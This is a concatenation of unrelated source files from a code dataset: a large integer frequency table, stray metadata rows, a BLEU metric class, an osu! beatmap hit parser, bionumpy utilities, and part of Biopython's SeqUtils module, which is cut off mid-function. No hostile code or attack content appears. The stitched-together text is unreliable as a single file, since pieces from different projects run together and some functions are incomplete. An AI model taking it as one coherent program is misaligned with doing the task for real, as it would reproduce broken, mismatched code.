3257,4108, 616,2210,4364,3180,2183,2294,5534,1833,5535,3525,4720,5536,1319,3770, # 4112
3771,1211,3636,1023,3258,1293,2812,5537,5538,5539,3905, 607,2311,3906, 762,2892, # 4128
1439,4365,1360,4721,1485,3072,5540,4722,1038,4366,1450,2062,2648,4367,1379,4723, # 4144
2593,5541,5542,4368,1352,1414,2330,2935,1172,5543,5544,3907,3908,4724,1798,1451, # 4160
5545,5546,5547,5548,2936,4109,4110,2492,2351, 411,4111,4112,3637,3333,3124,4725, # 4176
1561,2674,1452,4113,1375,5549,5550, 47,2974, 316,5551,1406,1591,2937,3181,5552, # 4192
1025,2142,3125,3182, 354,2740, 884,2228,4369,2412, 508,3772, 726,3638, 996,2433, # 4208
3639, 729,5553, 392,2194,1453,4114,4726,3773,5554,5555,2463,3640,2618,1675,2813, # 4224
919,2352,2975,2353,1270,4727,4115, 73,5556,5557, 647,5558,3259,2856,2259,1550, # 4240
1346,3024,5559,1332, 883,3526,5560,5561,5562,5563,3334,2775,5564,1212, 831,1347, # 4256
4370,4728,2331,3909,1864,3073, 720,3910,4729,4730,3911,5565,4371,5566,5567,4731, # 4272
5568,5569,1799,4732,3774,2619,4733,3641,1645,2376,4734,5570,2938, 669,2211,2675, # 4288
2434,5571,2893,5572,5573,1028,3260,5574,4372,2413,5575,2260,1353,5576,5577,4735, # 4304
3183, 518,5578,4116,5579,4373,1961,5580,2143,4374,5581,5582,3025,2354,2355,3912, # 4320
516,1834,1454,4117,2708,4375,4736,2229,2620,1972,1129,3642,5583,2776,5584,2976, # 4336
1422, 577,1470,3026,1524,3410,5585,5586, 432,4376,3074,3527,5587,2594,1455,2515, # 4352
2230,1973,1175,5588,1020,2741,4118,3528,4737,5589,2742,5590,1743,1361,3075,3529, # 4368
2649,4119,4377,4738,2295, 895, 924,4378,2171, 331,2247,3076, 166,1627,3077,1098, # 4384
5591,1232,2894,2231,3411,4739, 657, 403,1196,2377, 542,3775,3412,1600,4379,3530, # 4400
5592,4740,2777,3261, 576, 530,1362,4741,4742,2540,2676,3776,4120,5593, 842,3913, # 4416
5594,2814,2032,1014,4121, 213,2709,3413, 665, 621,4380,5595,3777,2939,2435,5596, # 4432
2436,3335,3643,3414,4743,4381,2541,4382,4744,3644,1682,4383,3531,1380,5597, 724, # 4448
2282, 600,1670,5598,1337,1233,4745,3126,2248,5599,1621,4746,5600, 651,4384,5601, # 4464
1612,4385,2621,5602,2857,5603,2743,2312,3078,5604, 716,2464,3079, 174,1255,2710, # 4480
4122,3645, 548,1320,1398, 728,4123,1574,5605,1891,1197,3080,4124,5606,3081,3082, # 4496
3778,3646,3779, 747,5607, 635,4386,4747,5608,5609,5610,4387,5611,5612,4748,5613, # 4512
3415,4749,2437, 451,5614,3780,2542,2073,4388,2744,4389,4125,5615,1764,4750,5616, # 4528
4390, 350,4751,2283,2395,2493,5617,4391,4126,2249,1434,4127, 488,4752, 458,4392, # 4544
4128,3781, 771,1330,2396,3914,2576,3184,2160,2414,1553,2677,3185,4393,5618,2494, # 4560
2895,2622,1720,2711,4394,3416,4753,5619,2543,4395,5620,3262,4396,2778,5621,2016, # 4576
2745,5622,1155,1017,3782,3915,5623,3336,2313, 201,1865,4397,1430,5624,4129,5625, # 4592
5626,5627,5628,5629,4398,1604,5630, 414,1866, 371,2595,4754,4755,3532,2017,3127, # 4608
4756,1708, 960,4399, 887, 389,2172,1536,1663,1721,5631,2232,4130,2356,2940,1580, # 4624
5632,5633,1744,4757,2544,4758,4759,5634,4760,5635,2074,5636,4761,3647,3417,2896, # 4640
4400,5637,4401,2650,3418,2815, 673,2712,2465, 709,3533,4131,3648,4402,5638,1148, # 4656
502, 634,5639,5640,1204,4762,3649,1575,4763,2623,3783,5641,3784,3128, 948,3263, # 4672
121,1745,3916,1110,5642,4403,3083,2516,3027,4132,3785,1151,1771,3917,1488,4133, # 4688
1987,5643,2438,3534,5644,5645,2094,5646,4404,3918,1213,1407,2816, 531,2746,2545, # 4704
3264,1011,1537,4764,2779,4405,3129,1061,5647,3786,3787,1867,2897,5648,2018, 120, # 4720
4406,4407,2063,3650,3265,2314,3919,2678,3419,1955,4765,4134,5649,3535,1047,2713, # 4736
1266,5650,1368,4766,2858, 649,3420,3920,2546,2747,1102,2859,2679,5651,5652,2000, # 4752
5653,1111,3651,2977,5654,2495,3921,3652,2817,1855,3421,3788,5655,5656,3422,2415, # 4768
2898,3337,3266,3653,5657,2577,5658,3654,2818,4135,1460, 856,5659,3655,5660,2899, # 4784
2978,5661,2900,3922,5662,4408, 632,2517, 875,3923,1697,3924,2296,5663,5664,4767, # 4800
3028,1239, 580,4768,4409,5665, 914, 936,2075,1190,4136,1039,2124,5666,5667,5668, # 4816
5669,3423,1473,5670,1354,4410,3925,4769,2173,3084,4137, 915,3338,4411,4412,3339, # 4832
1605,1835,5671,2748, 398,3656,4413,3926,4138, 328,1913,2860,4139,3927,1331,4414, # 4848
3029, 937,4415,5672,3657,4140,4141,3424,2161,4770,3425, 524, 742, 538,3085,1012, # 4864
5673,5674,3928,2466,5675, 658,1103, 225,3929,5676,5677,4771,5678,4772,5679,3267, # 4880
1243,5680,4142, 963,2250,4773,5681,2714,3658,3186,5682,5683,2596,2332,5684,4774, # 4896
5685,5686,5687,3536, 957,3426,2547,2033,1931,2941,2467, 870,2019,3659,1746,2780, # 4912
2781,2439,2468,5688,3930,5689,3789,3130,3790,3537,3427,3791,5690,1179,3086,5691, # 4928
3187,2378,4416,3792,2548,3188,3131,2749,4143,5692,3428,1556,2549,2297, 977,2901, # 4944
2034,4144,1205,3429,5693,1765,3430,3189,2125,1271, 714,1689,4775,3538,5694,2333, # 4960
3931, 533,4417,3660,2184, 617,5695,2469,3340,3539,2315,5696,5697,3190,5698,5699, # 4976
3932,1988, 618, 427,2651,3540,3431,5700,5701,1244,1690,5702,2819,4418,4776,5703, # 4992
3541,4777,5704,2284,1576, 473,3661,4419,3432, 972,5705,3662,5706,3087,5707,5708, # 5008
4778,4779,5709,3793,4145,4146,5710, 153,4780, 356,5711,1892,2902,4420,2144, 408, # 5024
803,2357,5712,3933,5713,4421,1646,2578,2518,4781,4782,3934,5714,3935,4422,5715, # 5040
2416,3433, 752,5716,5717,1962,3341,2979,5718, 746,3030,2470,4783,4423,3794, 698, # 5056
4784,1893,4424,3663,2550,4785,3664,3936,5719,3191,3434,5720,1824,1302,4147,2715, # 5072
3937,1974,4425,5721,4426,3192, 823,1303,1288,1236,2861,3542,4148,3435, 774,3938, # 5088
5722,1581,4786,1304,2862,3939,4787,5723,2440,2162,1083,3268,4427,4149,4428, 344, # 5104
1173, 288,2316, 454,1683,5724,5725,1461,4788,4150,2597,5726,5727,4789, 985, 894, # 5120
5728,3436,3193,5729,1914,2942,3795,1989,5730,2111,1975,5731,4151,5732,2579,1194, # 5136
425,5733,4790,3194,1245,3796,4429,5734,5735,2863,5736, 636,4791,1856,3940, 760, # 5152
1800,5737,4430,2212,1508,4792,4152,1894,1684,2298,5738,5739,4793,4431,4432,2213, # 5168
479,5740,5741, 832,5742,4153,2496,5743,2980,2497,3797, 990,3132, 627,1815,2652, # 5184
4433,1582,4434,2126,2112,3543,4794,5744, 799,4435,3195,5745,4795,2113,1737,3031, # 5200
1018, 543, 754,4436,3342,1676,4796,4797,4154,4798,1489,5746,3544,5747,2624,2903, # 5216
4155,5748,5749,2981,5750,5751,5752,5753,3196,4799,4800,2185,1722,5754,3269,3270, # 5232
1843,3665,1715, 481, 365,1976,1857,5755,5756,1963,2498,4801,5757,2127,3666,3271, # 5248
433,1895,2064,2076,5758, 602,2750,5759,5760,5761,5762,5763,3032,1628,3437,5764, # 5264
3197,4802,4156,2904,4803,2519,5765,2551,2782,5766,5767,5768,3343,4804,2905,5769, # 5280
4805,5770,2864,4806,4807,1221,2982,4157,2520,5771,5772,5773,1868,1990,5774,5775, # 5296
5776,1896,5777,5778,4808,1897,4158, 318,5779,2095,4159,4437,5780,5781, 485,5782, # 5312
938,3941, 553,2680, 116,5783,3942,3667,5784,3545,2681,2783,3438,3344,2820,5785, # 5328
3668,2943,4160,1747,2944,2983,5786,5787, 207,5788,4809,5789,4810,2521,5790,3033, # 5344
890,3669,3943,5791,1878,3798,3439,5792,2186,2358,3440,1652,5793,5794,5795, 941, # 5360
2299, 208,3546,4161,2020, 330,4438,3944,2906,2499,3799,4439,4811,5796,5797,5798, # 5376
)
| 83.663014
| 245
| 0.732816
|
4a143edef8ba6fc2a337d991bf11cd3a6e621e50
| 4,014
|
py
|
Python
|
metrics/bleu.py
|
songyouwei/TextGAN-PyTorch
|
6233ed5d22c1744b5a9890d89a16b60159a883e2
|
[
"MIT"
] | 1
|
2020-11-25T07:38:26.000Z
|
2020-11-25T07:38:26.000Z
|
metrics/bleu.py
|
songyouwei/TextGAN-PyTorch
|
6233ed5d22c1744b5a9890d89a16b60159a883e2
|
[
"MIT"
] | null | null | null |
metrics/bleu.py
|
songyouwei/TextGAN-PyTorch
|
6233ed5d22c1744b5a9890d89a16b60159a883e2
|
[
"MIT"
] | 1
|
2020-10-02T11:15:04.000Z
|
2020-10-02T11:15:04.000Z
|
# -*- coding: utf-8 -*-
# @Author : William
# @Project : TextGAN-william
# @FileName : bleu.py
# @Time : Created at 2019-05-31
# @Blog : http://zhiweil.ml/
# @Description :
# Copyrights (C) 2018. All Rights Reserved.
from multiprocessing import Pool
import nltk
import os
import random
from nltk.translate.bleu_score import SmoothingFunction
from metrics.basic import Metrics
class BLEU(Metrics):
def __init__(self, test_text=None, real_text=None, gram=3, portion=1):
if type(gram) == int:
super(BLEU, self).__init__('BLEU-%d' % gram)
elif type(gram) == list:
super(BLEU, self).__init__('BLEU-%s' % gram)
else:
raise AssertionError('Gram format error!')
self.test_text = test_text
self.real_text = real_text
self.gram = [gram] if type(gram) == int else gram
self.sample_size = 200 # BLEU scores remain nearly unchanged for self.sample_size >= 200
self.reference = None
self.is_first = True
        self.portion = portion  # fraction of the test data to use in evaluation; 1 means the whole test set
    def get_score(self, is_fast=True, ignore=False, given_gram=None):
        """Compute BLEU; `is_fast` parallelises scoring across CPU cores."""
        if ignore:
            return 0
        if self.is_first:
            self.get_reference()
            self.is_first = False
        if is_fast:
            return self.get_bleu_fast(given_gram)
        return self.get_bleu(given_gram)
def get_reference(self):
reference = self.real_text.copy()
# randomly choose a portion of test data
# In-place shuffle
random.shuffle(reference)
len_ref = len(reference)
reference = reference[:int(self.portion * len_ref)]
self.reference = reference
return reference
def get_bleu(self, given_gram=None):
if given_gram is not None: # for single gram
bleu = list()
reference = self.get_reference()
weight = tuple((1. / given_gram for _ in range(given_gram)))
for idx, hypothesis in enumerate(self.test_text[:self.sample_size]):
bleu.append(self.cal_bleu(reference, hypothesis, weight))
return round(sum(bleu) / len(bleu), 3)
else: # for multiple gram
all_bleu = []
for ngram in self.gram:
bleu = list()
reference = self.get_reference()
weight = tuple((1. / ngram for _ in range(ngram)))
for idx, hypothesis in enumerate(self.test_text[:self.sample_size]):
bleu.append(self.cal_bleu(reference, hypothesis, weight))
all_bleu.append(round(sum(bleu) / len(bleu), 3))
return all_bleu
@staticmethod
def cal_bleu(reference, hypothesis, weight):
return nltk.translate.bleu_score.sentence_bleu(reference, hypothesis, weight,
smoothing_function=SmoothingFunction().method1)
def get_bleu_fast(self, given_gram=None):
reference = self.get_reference()
if given_gram is not None: # for single gram
return self.get_bleu_parallel(ngram=given_gram, reference=reference)
else: # for multiple gram
all_bleu = []
for ngram in self.gram:
all_bleu.append(self.get_bleu_parallel(ngram=ngram, reference=reference))
return all_bleu
def get_bleu_parallel(self, ngram, reference):
weight = tuple((1. / ngram for _ in range(ngram)))
pool = Pool(os.cpu_count())
result = list()
for idx, hypothesis in enumerate(self.test_text[:self.sample_size]):
result.append(pool.apply_async(self.cal_bleu, args=(reference, hypothesis, weight)))
score = 0.0
cnt = 0
for i in result:
score += i.get()
cnt += 1
pool.close()
pool.join()
return round(score / cnt, 3)
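# --- Usage sketch (editor's illustration, not part of the original module) ---
# Assumes pre-tokenised corpora, i.e. each text is a list of token lists.
# if __name__ == '__main__':
#     real = [['the', 'cat', 'sat', 'on', 'the', 'mat'],
#             ['a', 'dog', 'ran', 'in', 'the', 'park']]
#     fake = [['the', 'dog', 'sat', 'on', 'the', 'mat']]
#     bleu = BLEU(test_text=fake, real_text=real, gram=[2, 3])
#     print(bleu.get_score(is_fast=False))  # list of rounded BLEU-2/BLEU-3 scores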
| 38.228571
| 115
| 0.601893
|
4a143fb5b870f72e25fe815ae6aacdd485326f46
| 1,362
|
py
|
Python
|
reamber/osu/OsuHit.py
|
Bestfast/reamberPy
|
91b76ca6adf11fbe8b7cee7c186481776a4d7aaa
|
[
"MIT"
] | null | null | null |
reamber/osu/OsuHit.py
|
Bestfast/reamberPy
|
91b76ca6adf11fbe8b7cee7c186481776a4d7aaa
|
[
"MIT"
] | null | null | null |
reamber/osu/OsuHit.py
|
Bestfast/reamberPy
|
91b76ca6adf11fbe8b7cee7c186481776a4d7aaa
|
[
"MIT"
] | null | null | null |
from __future__ import annotations
from dataclasses import dataclass
from reamber.base.Hit import Hit
from reamber.osu.OsuNoteMeta import OsuNoteMeta
@dataclass
class OsuHit(Hit, OsuNoteMeta):
@staticmethod
def readString(s: str, keys: int) -> OsuHit or None:
""" Reads a single line under the [Hitect] Label. This must explicitly be a Hit Object.
keys must be specified for conversion of code value to actual column."""
if s.isspace(): return None
sComma = s.split(",")
if len(sComma) < 5: return None
sColon = sComma[-1].split(":")
if len(sColon) < 5: return None
this = OsuHit()
this.column = this.xAxisToColumn(int(sComma[0]), keys)
this.offset = int(sComma[2])
this.hitsoundSet = int(sComma[4])
this.sampleSet = int(sColon[0])
this.additionSet = int(sColon[1])
this.customSet = int(sColon[2])
this.volume = int(sColon[3])
this.hitsoundFile = sColon[4]
return this
def writeString(self, keys: int) -> str:
""" Exports a .osu writable string """
return f"{OsuNoteMeta.columnToXAxis(self.column, keys=keys)},{192}," \
f"{int(self.offset)},{1},{self.hitsoundSet},{self.sampleSet}:" \
f"{self.additionSet}:{self.customSet}:{self.volume}:{self.hitsoundFile}"
| 33.219512
| 95
| 0.624816
|
4a143fbcc356a30a6cf78caefc16ed74e7d0c683
| 2,371
|
py
|
Python
|
bionumpy/util.py
|
knutdrand/bionumpy
|
2a520ebfce19f346284bd5cf21d6197f6ba801ba
|
[
"MIT"
] | null | null | null |
bionumpy/util.py
|
knutdrand/bionumpy
|
2a520ebfce19f346284bd5cf21d6197f6ba801ba
|
[
"MIT"
] | null | null | null |
bionumpy/util.py
|
knutdrand/bionumpy
|
2a520ebfce19f346284bd5cf21d6197f6ba801ba
|
[
"MIT"
] | 1
|
2022-03-07T21:58:03.000Z
|
2022-03-07T21:58:03.000Z
|
import numpy as np
import logging
from npstructures import RaggedArray
from .chromosome_map import ChromosomeMap
logger = logging.getLogger(__name__)
@ChromosomeMap()
def filter_on_intervals(entry, sorted_intervals):
if len(sorted_intervals) == 0:
mask = np.full(entry.position.shape, False)
else:
starts, ends = (sorted_intervals.start, sorted_intervals.end)
idx = np.searchsorted(starts, entry.position, side="right") - 1
idx = np.minimum(idx, starts.size - 1)
mask = (entry.position >= starts[idx]) & (entry.position < ends[idx])
return entry[mask]
@ChromosomeMap()
def get_snps(variants):
snps = variants[variants.is_snp()]
snps.ref_seq = snps.ref_seq.ravel()
snps.alt_seq = snps.alt_seq.ravel()
return snps
def convolution(func):
    def new_func(_sequence, window_size, *args, **kwargs):
        shape, sequence = (_sequence.shape, _sequence.ravel())
        convoluted = func(sequence, window_size, *args, **kwargs)
        if isinstance(_sequence, RaggedArray):
            out = RaggedArray(convoluted, shape)
        elif isinstance(_sequence, np.ndarray):
            out = np.lib.stride_tricks.as_strided(convoluted, shape)
        else:
            raise TypeError("Expected RaggedArray or np.ndarray, got %s" % type(_sequence))
        return out[..., : (-window_size + 1)]
return new_func
def rolling_window_function(func):
    def new_func(_sequence, window_size, *args, **kwargs):
        shape, sequence = (_sequence.shape, _sequence.ravel())
        windows = np.lib.stride_tricks.sliding_window_view(sequence, window_size)
        convoluted = func(windows, window_size, *args, **kwargs)
        if isinstance(_sequence, RaggedArray):
            out = RaggedArray(convoluted, shape)
        elif isinstance(_sequence, np.ndarray):
            out = np.lib.stride_tricks.as_strided(convoluted, shape)
        else:
            raise TypeError("Expected RaggedArray or np.ndarray, got %s" % type(_sequence))
        return out[..., : (-window_size + 1)]
return new_func
def pprint_one(sequence):
return "".join(chr(c) for c in sequence)
def pprint(sequences):
if isinstance(sequences, RaggedArray):
return [pprint_one(s) for s in sequences]
elif isinstance(sequences, np.ndarray):
if len(sequences.shape) == 1:
return pprint_one(sequences)
return [pprint(s) for s in sequences]
def plot(obj):
    if not hasattr(obj, "__plot__"):
        logger.warning(f"{obj} has no __plot__ method")
        return None
    # assumed intent: delegate to the object's own plotting hook
    return obj.__plot__()
| 32.479452
| 81
| 0.668494
|
4a143fe232ec9355b36a907bea6943db4ca12fb3
| 14,510
|
py
|
Python
|
Bio/SeqUtils/__init__.py
|
ntamas/biopython
|
ff12c3dd533274678113ecdbd88b0136fb77e565
|
[
"PostgreSQL"
] | 1
|
2022-01-18T22:33:06.000Z
|
2022-01-18T22:33:06.000Z
|
Bio/SeqUtils/__init__.py
|
ntamas/biopython
|
ff12c3dd533274678113ecdbd88b0136fb77e565
|
[
"PostgreSQL"
] | null | null | null |
Bio/SeqUtils/__init__.py
|
ntamas/biopython
|
ff12c3dd533274678113ecdbd88b0136fb77e565
|
[
"PostgreSQL"
] | null | null | null |
#!/usr/bin/env python
# Created: Wed May 29 08:07:18 2002
# thomas@cbs.dtu.dk, Cecilia.Alsmark@ebc.uu.se
# Copyright 2001 by Thomas Sicheritz-Ponten and Cecilia Alsmark.
# All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Miscellaneous functions for dealing with sequences."""
from __future__ import print_function
import re
from math import pi, sin, cos
from Bio.Seq import Seq
from Bio.Alphabet import IUPAC
from Bio.Data import IUPACData
######################################
# DNA
######################
# {{{
def GC(seq):
"""Calculates G+C content, returns the percentage (float between 0 and 100).
    Copes with mixed case sequences, and with the ambiguous nucleotide S (G or C)
when counting the G and C content. The percentage is calculated against
the full length, e.g.:
>>> from Bio.SeqUtils import GC
>>> GC("ACTGN")
40.0
Note that this will return zero for an empty sequence.
"""
try:
gc = sum(map(seq.count, ['G', 'C', 'g', 'c', 'S', 's']))
return gc*100.0/len(seq)
except ZeroDivisionError:
return 0.0
def GC123(seq):
"""Calculates total G+C content plus first, second and third positions.
Returns a tuple of four floats (percentages between 0 and 100) for the
entire sequence, and the three codon positions. e.g.
>>> from Bio.SeqUtils import GC123
>>> GC123("ACTGTN")
(40.0, 50.0, 50.0, 0.0)
Copes with mixed case sequences, but does NOT deal with ambiguous
nucleotides.
"""
    d = {}
for nt in ['A', 'T', 'G', 'C']:
d[nt] = [0, 0, 0]
for i in range(0, len(seq), 3):
codon = seq[i:i+3]
if len(codon) < 3:
codon += ' '
for pos in range(0, 3):
for nt in ['A', 'T', 'G', 'C']:
if codon[pos] == nt or codon[pos] == nt.lower():
d[nt][pos] += 1
gc = {}
gcall = 0
nall = 0
    for i in range(0, 3):
        n = d['G'][i] + d['C'][i] + d['T'][i] + d['A'][i]
        try:
            gc[i] = (d['G'][i] + d['C'][i])*100.0/n
        except ZeroDivisionError:
            gc[i] = 0
        gcall = gcall + d['G'][i] + d['C'][i]
        nall = nall + n
gcall = 100.0*gcall/nall
return gcall, gc[0], gc[1], gc[2]
def GC_skew(seq, window=100):
"""Calculates GC skew (G-C)/(G+C) for multiple windows along the sequence.
Returns a list of ratios (floats), controlled by the length of the sequence
and the size of the window.
Does NOT look at any ambiguous nucleotides.
"""
# 8/19/03: Iddo: added lowercase
values = []
for i in range(0, len(seq), window):
s = seq[i: i + window]
g = s.count('G') + s.count('g')
c = s.count('C') + s.count('c')
skew = (g-c)/float(g+c)
values.append(skew)
return values
def xGC_skew(seq, window=1000, zoom=100,
r=300, px=100, py=100):
"""Calculates and plots normal and accumulated GC skew (GRAPHICS !!!)."""
    try:
        from tkinter import Scrollbar, Canvas, BOTTOM, BOTH, ALL, \
                            VERTICAL, HORIZONTAL, RIGHT, LEFT, X, Y
    except ImportError:  # Python 2 fallback
        from Tkinter import Scrollbar, Canvas, BOTTOM, BOTH, ALL, \
                            VERTICAL, HORIZONTAL, RIGHT, LEFT, X, Y
yscroll = Scrollbar(orient=VERTICAL)
xscroll = Scrollbar(orient=HORIZONTAL)
canvas = Canvas(yscrollcommand=yscroll.set,
xscrollcommand=xscroll.set, background='white')
win = canvas.winfo_toplevel()
win.geometry('700x700')
yscroll.config(command=canvas.yview)
xscroll.config(command=canvas.xview)
yscroll.pack(side=RIGHT, fill=Y)
xscroll.pack(side=BOTTOM, fill=X)
canvas.pack(fill=BOTH, side=LEFT, expand=1)
canvas.update()
X0, Y0 = r + px, r + py
x1, x2, y1, y2 = X0 - r, X0 + r, Y0 - r, Y0 + r
ty = Y0
canvas.create_text(X0, ty, text='%s...%s (%d nt)' % (seq[:7], seq[-7:], len(seq)))
ty += 20
canvas.create_text(X0, ty, text='GC %3.2f%%' % (GC(seq)))
ty += 20
canvas.create_text(X0, ty, text='GC Skew', fill='blue')
ty += 20
canvas.create_text(X0, ty, text='Accumulated GC Skew', fill='magenta')
ty += 20
canvas.create_oval(x1, y1, x2, y2)
acc = 0
start = 0
for gc in GC_skew(seq, window):
r1 = r
acc += gc
# GC skew
alpha = pi - (2*pi*start)/len(seq)
r2 = r1 - gc*zoom
x1 = X0 + r1 * sin(alpha)
y1 = Y0 + r1 * cos(alpha)
x2 = X0 + r2 * sin(alpha)
y2 = Y0 + r2 * cos(alpha)
canvas.create_line(x1, y1, x2, y2, fill='blue')
# accumulated GC skew
r1 = r - 50
r2 = r1 - acc
x1 = X0 + r1 * sin(alpha)
y1 = Y0 + r1 * cos(alpha)
x2 = X0 + r2 * sin(alpha)
y2 = Y0 + r2 * cos(alpha)
canvas.create_line(x1, y1, x2, y2, fill='magenta')
canvas.update()
start += window
canvas.configure(scrollregion=canvas.bbox(ALL))
def molecular_weight(seq):
"""Calculate the molecular weight of a DNA sequence."""
if isinstance(seq, str):
seq = Seq(seq, IUPAC.unambiguous_dna)
weight_table = IUPACData.unambiguous_dna_weights
return sum(weight_table[x] for x in seq)
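# Example (editor's note): molecular_weight sums per-nucleotide weights from
# IUPACData.unambiguous_dna_weights, e.g.
#     molecular_weight("AA") == 2 * IUPACData.unambiguous_dna_weights["A"]
# Ambiguous letters such as N are not in that table and raise a KeyError.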
def nt_search(seq, subseq):
"""Search for a DNA subseq in sequence.
use ambiguous values (like N = A or T or C or G, R = A or G etc.)
searches only on forward strand
"""
pattern = ''
for nt in subseq:
value = IUPACData.ambiguous_dna_values[nt]
if len(value) == 1:
pattern += value
else:
pattern += '[%s]' % value
pos = -1
result = [pattern]
while True:
pos += 1
s = seq[pos:]
m = re.search(pattern, s)
if not m:
break
pos += int(m.start(0))
result.append(pos)
return result
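# Example (editor's sketch): ambiguity codes expand to character classes, so
#     nt_search("ACTG", "R")        # R = A or G
# returns the compiled pattern first, then each match start position:
#     ['[AG]', 0, 3]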
# }}}
######################################
# Protein
######################
# {{{
def seq3(seq, custom_map={'*': 'Ter'}, undef_code='Xaa'):
"""Turn a one letter code protein sequence into one with three letter codes.
The single input argument 'seq' should be a protein sequence using single
letter codes, either as a python string or as a Seq or MutableSeq object.
This function returns the amino acid sequence as a string using the three
letter amino acid codes. Output follows the IUPAC standard (including
ambiguous characters B for "Asx", J for "Xle" and X for "Xaa", and also U
for "Sel" and O for "Pyl") plus "Ter" for a terminator given as an asterisk.
Any unknown character (including possible gap characters), is changed into
'Xaa'.
e.g.
>>> from Bio.SeqUtils import seq3
>>> seq3("MAIVMGRWKGAR*")
'MetAlaIleValMetGlyArgTrpLysGlyAlaArgTer'
You can set a custom translation of the codon termination code using the
"custom_map" argument, e.g.
>>> seq3("MAIVMGRWKGAR*", custom_map={"*": "***"})
'MetAlaIleValMetGlyArgTrpLysGlyAlaArg***'
You can also set a custom translation for non-amino acid characters, such
as '-', using the "undef_code" argument, e.g.
>>> seq3("MAIVMGRWKGA--R*", undef_code='---')
'MetAlaIleValMetGlyArgTrpLysGlyAla------ArgTer'
If not given, "undef_code" defaults to "Xaa", e.g.
>>> seq3("MAIVMGRWKGA--R*")
'MetAlaIleValMetGlyArgTrpLysGlyAlaXaaXaaArgTer'
This function was inspired by BioPerl's seq3.
"""
    # build a copy rather than calling .update() on the IUPACData dict,
    # to preserve its initial state (it may be imported in other modules)
    threecode = dict(IUPACData.protein_letters_1to3_extended)
    threecode.update(custom_map)
#We use a default of 'Xaa' for undefined letters
#Note this will map '-' to 'Xaa' which may be undesirable!
return ''.join([threecode.get(aa, undef_code) for aa in seq])
def seq1(seq, custom_map={'Ter': '*'}, undef_code='X'):
"""Turns a three-letter code protein sequence into one with single letter codes.
The single input argument 'seq' should be a protein sequence using three-
letter codes, either as a python string or as a Seq or MutableSeq object.
This function returns the amino acid sequence as a string using the one
letter amino acid codes. Output follows the IUPAC standard (including
ambiguous characters "B" for "Asx", "J" for "Xle", "X" for "Xaa", "U" for
"Sel", and "O" for "Pyl") plus "*" for a terminator given the "Ter" code.
Any unknown character (including possible gap characters), is changed into
'-'.
e.g.
    >>> from Bio.SeqUtils import seq1
>>> seq1("MetAlaIleValMetGlyArgTrpLysGlyAlaArgTer")
'MAIVMGRWKGAR*'
The input is case insensitive, e.g.
    >>> from Bio.SeqUtils import seq1
>>> seq1("METalaIlEValMetGLYArgtRplysGlyAlaARGTer")
'MAIVMGRWKGAR*'
You can set a custom translation of the codon termination code using the
"custom_map" argument, e.g.
>>> seq1("MetAlaIleValMetGlyArgTrpLysGlyAlaArg***", custom_map={"***": "*"})
'MAIVMGRWKGAR*'
You can also set a custom translation for non-amino acid characters, such
as '-', using the "undef_code" argument, e.g.
>>> seq1("MetAlaIleValMetGlyArgTrpLysGlyAla------ArgTer", undef_code='?')
'MAIVMGRWKGA??R*'
If not given, "undef_code" defaults to "X", e.g.
>>> seq1("MetAlaIleValMetGlyArgTrpLysGlyAla------ArgTer")
'MAIVMGRWKGAXXR*'
"""
# reverse map of threecode
# upper() on all keys to enable caps-insensitive input seq handling
onecode = dict((k.upper(), v) for k, v in
IUPACData.protein_letters_3to1_extended.items())
# add the given termination codon code and custom maps
    onecode.update((k.upper(), v) for (k, v) in custom_map.items())
seqlist = [seq[3*i:3*(i+1)] for i in range(len(seq) // 3)]
return ''.join([onecode.get(aa.upper(), undef_code) for aa in seqlist])
# }}}
######################################
# Mixed ???
######################
# {{{
def six_frame_translations(seq, genetic_code=1):
"""Formatted string showing the 6 frame translations and GC content.
nice looking 6 frame translation with GC content - code from xbbtools
    similar to DNA Strider's six-frame translation
>>> from Bio.SeqUtils import six_frame_translations
>>> print(six_frame_translations("AUGGCCAUUGUAAUGGGCCGCUGA"))
GC_Frame: a:5 t:0 g:8 c:5
Sequence: auggccauug ... gggccgcuga, 24 nt, 54.17 %GC
<BLANKLINE>
<BLANKLINE>
1/1
G H C N G P L
W P L * W A A
M A I V M G R *
auggccauuguaaugggccgcuga 54 %
uaccgguaacauuacccggcgacu
A M T I P R Q
H G N Y H A A S
P W Q L P G S
<BLANKLINE>
<BLANKLINE>
"""
from Bio.Seq import reverse_complement, translate
anti = reverse_complement(seq)
comp = anti[::-1]
length = len(seq)
frames = {}
for i in range(0, 3):
fragment_length = 3 * ((length-i) // 3)
frames[i+1] = translate(seq[i:i+fragment_length], genetic_code)
frames[-(i+1)] = translate(anti[i:i+fragment_length], genetic_code)[::-1]
# create header
if length > 20:
short = '%s ... %s' % (seq[:10], seq[-10:])
else:
short = seq
header = 'GC_Frame: '
for nt in ['a', 't', 'g', 'c']:
header += '%s:%d ' % (nt, seq.count(nt.upper()))
header += '\nSequence: %s, %d nt, %0.2f %%GC\n\n\n' % (short.lower(), length, GC(seq))
res = header
for i in range(0, length, 60):
subseq = seq[i:i+60]
csubseq = comp[i:i+60]
p = i//3
        res += '%d/%d\n' % (i+1, i//3+1)
        res += ' ' + ' '.join(frames[3][p:p+20]) + '\n'
        res += ' ' + ' '.join(frames[2][p:p+20]) + '\n'
        res += ' '.join(frames[1][p:p+20]) + '\n'
        # seq
        res += subseq.lower() + '%5d %%\n' % int(GC(subseq))
        res += csubseq.lower() + '\n'
        # - frames
        res += ' '.join(frames[-2][p:p+20]) + ' \n'
        res += ' ' + ' '.join(frames[-1][p:p+20]) + '\n'
        res += ' ' + ' '.join(frames[-3][p:p+20]) + '\n\n'
return res
# }}}
######################################
# FASTA file utilities
######################
# {{{
def quick_FASTA_reader(file):
"""Simple FASTA reader, returning a list of string tuples (OBSOLETE).
The single argument 'file' should be the filename of a FASTA format file.
This function will open and read in the entire file, constructing a list
of all the records, each held as a tuple of strings (the sequence name or
title, and its sequence).
>>> seqs = quick_FASTA_reader("Fasta/dups.fasta")
>>> for title, sequence in seqs:
... print("%s %s" % (title, sequence))
alpha ACGTA
beta CGTC
gamma CCGCC
alpha (again - this is a duplicate entry to test the indexing code) ACGTA
delta CGCGC
    This function is fast, but because it returns the data as a single
    in-memory list, it is unsuitable for large files where an iterator
    approach is preferable.
You are generally encouraged to use Bio.SeqIO.parse(handle, "fasta") which
allows you to iterate over the records one by one (avoiding having all the
records in memory at once). Using Bio.SeqIO also makes it easy to switch
between different input file formats. However, please note that rather
than simple strings, Bio.SeqIO uses SeqRecord objects for each record.
If you want to use simple strings, use the function SimpleFastaParser
added to Bio.SeqIO.FastaIO in Biopython 1.61 instead.
"""
handle = open(file)
entries = []
from Bio.SeqIO.FastaIO import SimpleFastaParser
